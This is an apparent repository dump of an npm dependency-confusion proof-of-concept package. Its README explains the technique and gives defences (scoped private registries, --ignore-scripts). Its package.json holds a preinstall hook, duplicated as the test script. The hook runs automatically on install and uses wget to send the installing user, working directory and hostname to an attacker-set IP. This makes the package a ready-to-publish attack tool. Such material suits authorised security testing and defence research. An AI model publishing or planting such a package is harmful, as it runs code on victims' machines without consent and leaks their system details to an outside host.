├── README.md
├── index.js
└── package.json

/README.md:
--------------------------------------------------------------------------------
1 | # NPM Dependency Confusion PoC
2 | A simple proof-of-concept (PoC) package for testing whether an environment is vulnerable to dependency confusion. The `preinstall` script in `package.json` runs automatically on `npm install` and sends the installing user, working directory and hostname in the query string of a plain-HTTP request to the address set in the script, so a received request shows that this package was resolved and its lifecycle scripts ran on that host. Pinning internal package names to a private registry (for example with scoped packages) prevents the wrong package from being resolved, and installing with `--ignore-scripts` keeps lifecycle scripts from running.
3 | 
4 | Inspired by Alex Birsan's research.
5 | 
6 | Reference: [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
7 | 
--------------------------------------------------------------------------------
/index.js:
--------------------------------------------------------------------------------
1 | exports.printMsg = function() {
2 | console.log("This is a message from the demo package");
3 | }
4 | 
--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "dependency-confusion-poc",
3 | "version": "1.0.0",
4 | "description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
5 | "main": "index.js",
6 | "scripts": {
7 | "test": "wget --quiet \"http://8.8.8.8/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
8 | "preinstall": "wget --quiet \"http://8.8.8.8/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
9 | },
10 | "keywords": [
11 | "test",
12 | "PoC"
13 | ],
14 | "dependencies": {},
15 | "config": {
16 | "unsafe-perm":true
17 | },
18 | "author": "WayCup",
19 | "license": "ISC"
20 | }
21 | 
--------------------------------------------------------------------------------